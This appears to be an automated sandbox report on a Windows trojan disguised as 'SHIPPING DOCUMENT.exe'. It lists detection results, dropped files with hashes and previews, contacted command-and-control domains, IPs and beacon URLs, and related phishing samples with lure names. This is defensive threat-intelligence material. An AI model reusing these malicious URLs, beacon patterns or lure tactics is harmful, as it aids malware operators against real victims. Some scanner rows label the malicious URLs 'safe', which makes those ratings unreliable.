          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SHIPPING DOCUMENT.exe34%VirustotalBrowse
          SHIPPING DOCUMENT.exe45%ReversingLabsWin32.Trojan.Predator
          SHIPPING DOCUMENT.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll17%ReversingLabsWin32.Trojan.Jaik

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.1.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.SHIPPING DOCUMENT.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          8.2.NETSTAT.EXE.32de860.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          8.2.NETSTAT.EXE.3dcf834.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.barkinlot.com0%VirustotalBrowse
          www.union-green.com0%VirustotalBrowse
          www.fuerzaagavera.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.union-green.com/dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.yabovip1288.com0%Avira URL Cloudsafe
          www.knighttechinca.com/dxe/0%Avira URL Cloudsafe
          http://www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.barkinlot.com/dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.buyruon.com/dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.barkinlot.com
          		107.151.79.234
          		truetrueunknown
          www.union-green.com
          		154.220.41.208
          		truetrueunknown
          www.fuerzaagavera.com
          		64.190.62.111
          		truetrueunknown
          buyruon.com
          		34.102.136.180
          		truefalse
            		unknown
            www.buyruon.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.union-green.com/dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7Jtrue
              • Avira URL Cloud: safe
              		unknown
              www.knighttechinca.com/dxe/true
              • Avira URL Cloud: safe
              		low
              http://www.fuerzaagavera.com/dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7Jtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.barkinlot.com/dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7Jtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.buyruon.com/dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7Jfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorErrorSHIPPING DOCUMENT.exefalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.yabovip1288.comNETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorSHIPPING DOCUMENT.exefalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.%s.comPAexplorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://www.fonts.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpfalse
                                          		high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          107.151.79.234
                                          		www.barkinlot.comUnited States
                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                          154.220.41.208
                                          		www.union-green.comSeychelles
                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                          34.102.136.180
                                          		buyruon.comUnited States
                                          		15169GOOGLEUSfalse
                                          64.190.62.111
                                          		www.fuerzaagavera.comUnited States
                                          		11696NBS11696UStrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:404217
                                          Start date:04.05.2021
                                          Start time:20:09:44
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 58s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:SHIPPING DOCUMENT.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:22
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@8/4@4/5
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 29% (good quality ratio 26.4%)
                                          • Quality average: 74.8%
                                          • Quality standard deviation: 31.1%
                                          HCA Information:
                                          • Successful, ratio: 90%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          154.220.41.208REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                          • www.union-green.com/dxe/?rL=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMLo2PMoXx0QTgunIdw==&2dqLWB=RXBtNzex
                                          64.190.62.111don.exeGet hashmaliciousBrowse
                                          • www.nouvellecartebancaire.com/uoe8/?Y4plXns=Nr6XIQb0LJy7g3BSKo+ydWEWOraq59KjgAXxyRNEYt403hVE3BM/4MFy9ZsB9HNXCzAN&BR=cjlpd
                                          DocNo2300058329.exeGet hashmaliciousBrowse
                                          • www.chandlerguo.com/ued5/?BR-d4N=7nMpkDO0IdLxFH6P&RL0=bezfYCf7hjYaP7aKm321naJfBhBryPc+PKIQpAm7WhkghlmEMQZYG8wsgYserUfX3+Mq
                                          APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exeGet hashmaliciousBrowse
                                          • www.fittogo.net/o86d/?2dqLW0=RXBPDPWx&Sh=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21zk7Okf9Jgd9
                                          VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                          • www.fittogo.net/o86d/?-Z1l=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21wISNkjFADorID+xhg==&4h2=k2JX5d7XCd603LJP
                                          Bank Details Pdf.exeGet hashmaliciousBrowse
                                          • www.perfumebarbyparisine.com/ou59/?BR=chrxU&Vt=AgbchBVRB6f0q4bgYsoYiFpejO9RxmhiEQZzFQZe8IuCEkVt+YPwO8avVoDsOpMG+BSV
                                          Wire transfer.exeGet hashmaliciousBrowse
                                          • www.calmncuddle.com/ca84/?BvI=b2S2nlAqkf94DvgS5p4/7HJ/I6FJ9VAC3yY7Dn54mkFcHBVvzbYxVttZk7rYdKw4iUSE&J690D=ej8PjzaXfDt
                                          NQ1vVJKBcH.exeGet hashmaliciousBrowse
                                          • www.yashaxi.com/sdh/?ArR=pv77fZTsJCF4Ec5vscLwE01hgHoFOGvdvEJpexrJMVXWZtOzLqqRHfmNiKriOCyuhwCB&_jqp3R=mvR89v50jF6X
                                          A9C9824497908A525A168C43D743FEA3D1F5DC4C3004E.exeGet hashmaliciousBrowse
                                          • cryptofaze.com/index.php
                                          RDAx9iDSEL.exeGet hashmaliciousBrowse
                                          • www.trendbold.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiDwNVcpNHrzg
                                          Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                                          • www.yashaxi.com/sdh/?1b8Hsf=pv77fZTsJCF4Ec5vscLwE01hgHoFOGvdvEJpexrJMVXWZtOzLqqRHfmNiKnidS+t4gCXd4CYSg==&j2MHoV=aDKhQD6PL
                                          TT COPY (39.750,00 USD).exeGet hashmaliciousBrowse
                                          • www.fittogo.net/o86d/?8p-LVP8p=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21wErBFPFXF06&bj=VTWpjpVhfN0xwFd
                                          lFfDzzZYTl.exeGet hashmaliciousBrowse
                                          • www.trendbold.com/p2io/?iBIXf4M=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiAcdJt12AeaxGWCaPA==&_RAd4V=YL0THJvhl8d
                                          SWIFT COPY.exeGet hashmaliciousBrowse
                                          • www.wbz.xyz/fcn/?2d=l8eDk&-Z2hilB=BzqqiqEgWSn4H0nj5q3NVeG0jFLcTOMmsdTr50lz0wrZDnWPoyh/rI5OywZ8yBQmwoLh
                                          1400000004-arrival.exeGet hashmaliciousBrowse
                                          • www.healthpro.info/hwad/?p0D=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUt/mVWAfJkXy&wPN=OtWDJt
                                          payment invoice.exeGet hashmaliciousBrowse
                                          • www.healthpro.info/hwad/?b6=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUuTlJmMnEFqk5jpuuQ==&CRi=_FN8K4
                                          lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                          • www.trendbold.com/p2io/?E48=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiAckWcV1OIG2GWCdcw==&oPqLWb=dVeDBDrHInjx
                                          PO#EIMG_501_367_089.exeGet hashmaliciousBrowse
                                          • www.healthpro.info/hwad/?a4n=tXLt5bAxNvWd1&FVTD=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUufcFHgnTD21
                                          Material Requisition for Quotation (MRQ).exeGet hashmaliciousBrowse
                                          • www.pure-tab.com/ea9e/?MvyX=RhJcbY/87Jh8L+sEB9htMI61pUz/7YIRuLTc8dYvVpTofAQeCaStCENnYxZROgjyrCT5&VPKp=wBNhY2XpgdW42Z
                                          bank payment confirmation.exeGet hashmaliciousBrowse
                                          • www.wfl.xyz/nyd/?v2Mpe=eugD6+dzNk4cgZThSvoact52pzI/j09Lu7ql9fn1MVt/tcTBfLynjjWzFLxVYpnDcWHt&Rxo4n8=RpgHKpR0D
                                          Swift Copy#0002.exeGet hashmaliciousBrowse
                                          • www.ytx.xyz/ve9m/?4h5=k2JX5xRHxZU0PLap&-Z2D=d3g+3hGlG471rl2gQtpnZ/9bIQo5mtPA1dwP828avrl8Fn5x/8540ZGqLo19wTrVHoeP

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.union-green.comREQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                          • 154.220.41.208

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          POWERLINE-AS-APPOWERLINEDATACENTERHKc8080fbf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                          • 154.86.42.252
                                          REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                          • 154.220.41.208
                                          O1E623TjjW.exeGet hashmaliciousBrowse
                                          • 43.230.169.157
                                          SWIT BANK PAPER PAYMENT.exeGet hashmaliciousBrowse
                                          • 154.213.207.4
                                          PO_29_00412.exeGet hashmaliciousBrowse
                                          • 154.216.244.232
                                          z5Wqivscwd.exeGet hashmaliciousBrowse
                                          • 154.88.201.82
                                          8480fe6d_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 154.88.208.8
                                          S4gONKzrzB.exeGet hashmaliciousBrowse
                                          • 154.216.85.54
                                          PO17439.exeGet hashmaliciousBrowse
                                          • 103.234.52.224
                                          gunzipped.exeGet hashmaliciousBrowse
                                          • 103.234.52.32
                                          FORM C.xlsxGet hashmaliciousBrowse
                                          • 160.124.11.194
                                          TT.exeGet hashmaliciousBrowse
                                          • 156.252.92.240
                                          2sj75tLtYO.exeGet hashmaliciousBrowse
                                          • 154.88.205.42
                                          z3hir.x86Get hashmaliciousBrowse
                                          • 156.242.113.180
                                          Invoice.exeGet hashmaliciousBrowse
                                          • 103.234.52.211
                                          dw0Iro1gcR.exeGet hashmaliciousBrowse
                                          • 160.124.11.194
                                          3fbdTbPuA2dsNJL.exeGet hashmaliciousBrowse
                                          • 154.201.165.231
                                          HXHpRUwveo.exeGet hashmaliciousBrowse
                                          • 156.230.124.222
                                          CATALOG.exeGet hashmaliciousBrowse
                                          • 156.252.92.240
                                          PaymentBNK#2.PDF.exeGet hashmaliciousBrowse
                                          • 154.201.206.137

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\ex08fobkizb
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.974118270734614
                                          Encrypted:false
                                          SSDEEP:192:CM79ZiFYzt3oSmJndTNzwT4JDPB9QB8Fbwlq:7iFkYJdTmUJ77wlq
                                          MD5:69CF51438619322E76E52330708D6476
                                          SHA1:CF68FE09A25AD784EACD51430B02EFFD02B9E836
                                          SHA-256:B138964C634ECA75042FEE97E056E25FDB7BED585ED1CA2C883CAFFC28184F6F
                                          SHA-512:09CA224E6EAF25BB470F56BA6F1A8EE39296F45D0B56555698C5C35250FE45ACC99CAEBE641E91156C5887D09D768B81B7D3FF9D4A0BDDFE9AC7B77FD13A7B47
                                          Malicious:false
                                          Reputation:low
                                          Preview: .;MH.....].^..SV.j..uF.~..o...s%...'.xXR..s.`.=n}..VlH....\.....5...U.../LC0,.i...96if.U?@=[..D.!52;..-....349.......!......BO........Pi......%.V......x. |..)&'.[YVz.U.....Qs.>.ebJ06K..;..$.................Iv..0..<.]...gx`......_..~.=jJ..w. Y1|}la....g..o..p...YVWy........}...(.ur{.......sty...de..........W...3=G<.)_...5_e:...KLA_*S`..'ifgI....../0M+......%"+.............GX......k .'n....#@~w....I|.,&'.*pu....;.3....W.ba.RM...$...........IL....5/...I6:....V..*.A.J-.0IC...H.{X.........DIF`./..\.y.=ViT.)p....'.(.y."..u..t.oR.Q.v}.*b..$...B.A.{........6wh"..K.5.CB...fW mL.-..f!."..c.5..fJ34..!............MZ....U...i...UD.V.-....y...#.g%.k6t=.}L. .I.p7iy._....O...e.....+..|..M...........B`.c._n...s...oB.........$..(W.%...CD^JUSR..OfNO..iS.....Z.L.+={{zB....s.0...d.....v.x.........>.=......>........A..>L?.../=:[gkm.bE;<...sM..496.c.(.A%% ....F...L[....R.....Tt...........$./.;:...xG.sJ..LG.<...b..a...QP..........'0S)*)........>7-........iz.
                                          C:\Users\user\AppData\Local\Temp\kmvt65sofzhcy6
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.999109498781475
                                          Encrypted:true
                                          SSDEEP:3072:d7DdGNe8lzSGePvjqjjGdz2YruLwmPrghVxoMb6im3Ygvadup37:d7DdGNblz7SLqXGdB8HUl613Y1du17
                                          MD5:AACE68FCC1505963CA9578E8AB837594
                                          SHA1:E0EE89C6AE7AC02CED2731C35B4BA81BD3A441CC
                                          SHA-256:1AD3F5A4C5BECBADD1E7C87DCFEE1330A604964B0918FD24DD77E1253476BFE8
                                          SHA-512:B58245FFFDB739549075B2D5CEA031CF4285D063DE2C4726BB0A7F628C30F4784D63A0251482F413B9F39A495CD4C60ECABD6CD55E0FA4AD4D4D9CD10D276821
                                          Malicious:false
                                          Reputation:low
                                          Preview: ~d[....&.`..^.\D..5.....t_.....Na...(g..........\...3.8.....h...]Ud,......n..Lk..~.`>.]N.:m>.C._1..=H....z`.M..x........\.....\..N.+....f........"M. o9...,H.+U.(Y..\.dw......X.\..j.y..Q......5j..:-.........w....4.V........$......9.....~E%..6$F=<.....(.qe.#....9..JsM#s..K...5uoa.U.....9..._...........7.....=....W=.k..u....H......i../>jm.i..zK1b....W..A.{..Il....r.....".E@I.9:3I...a..r.e_...XN]l....w...z{....j.O...wv.j.-..N...... ..P.fL....e.@...d.e..6....U.T.H-Z4.."..m....b...0rhP.$p.>\.[.<y+..3?...Je...<...P..IS......ryR..:..r.{..sG_..`..9..pn..gK...%...Q..?M..!...@.vX.L..<Lu...0...W....~..A\k.ab.S..../. .........Z]....1..+;2u.&>:.'C..<.{!...u.;..}_..W3...z.....;r..z8...n.......F..:..\<.K..Uej)b....X.T...ri....)...&..e~f.]...u.)..&..B.T.!.......w.&.&....1..p.[8.|!H.p..]u.).=....@.h......$.Pu..Cq +..3H.-.x...&.!.........&ua..y...&dS.......c'g....l..;......@.~..... .5$......2..k;B......_T`..s....-\...CY.q....F...zfI..l...Z74..N..
                                          C:\Users\user\AppData\Local\Temp\nseA921.tmp
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):201373
                                          Entropy (8bit):7.948650642039385
                                          Encrypted:false
                                          SSDEEP:3072:EjG7DdGNe8lzSGePvjqjjGdz2YruLwmPrghVxoMb6im3Ygvadup3:Ea7DdGNblz7SLqXGdB8HUl613Y1du1
                                          MD5:22CC1D52F7688CE084D84D06B5B18523
                                          SHA1:C41A04F9646DFC78B1588E47DEFF50A7FF3B43A2
                                          SHA-256:261A44AAD8BE10E8CA564F30810D9984A5CCFE4231E47987B9276777079C8BF1
                                          SHA-512:A7C9FF520347982CA333AEF083ADB8839C5899A0A7A6755313AD8009C25F84573F990E32B10E4B5F0A6F03B0387ECCA8570D56223E31F84FB69A79A198DE2F19
                                          Malicious:false
                                          Reputation:low
                                          Preview: ........,...................................................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5632
                                          Entropy (8bit):4.090507095598033
                                          Encrypted:false
                                          SSDEEP:48:qixZ/QGn1ASkT3jNDZbitP8Xst6F22ltnl0qe/hqHht0j9Pl4jdajpqKncLjNS3I:Bhn1ASknNDZ+tltm2InlLRul4jdkpN3
                                          MD5:45ADFA33A0E6A780E55F543A36143542
                                          SHA1:540BBBF9EC26DDEF911BA80EE0365CF23B687749
                                          SHA-256:5299A5C9BA1296DB0A9F804741B58EC7A0FEDAEF8937E3CDC21D3523E0449EE3
                                          SHA-512:2AD608026D78DEDD9F803B6A2F7E27E5590D9DF5870ADECCBDFC353B1D546450075743B499EBCF57F8D67886188DB92BA8F968B4D71FED624FD948D3B047A0E3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.}XX..XX..XX...0./]X....,.UX..XX..xX...1./YX...1./YX...1./YX..RichXX..........PE..L...]b.`...........!......................... ...............................@......................................p!..P...."....................................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...D....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.896133124119752
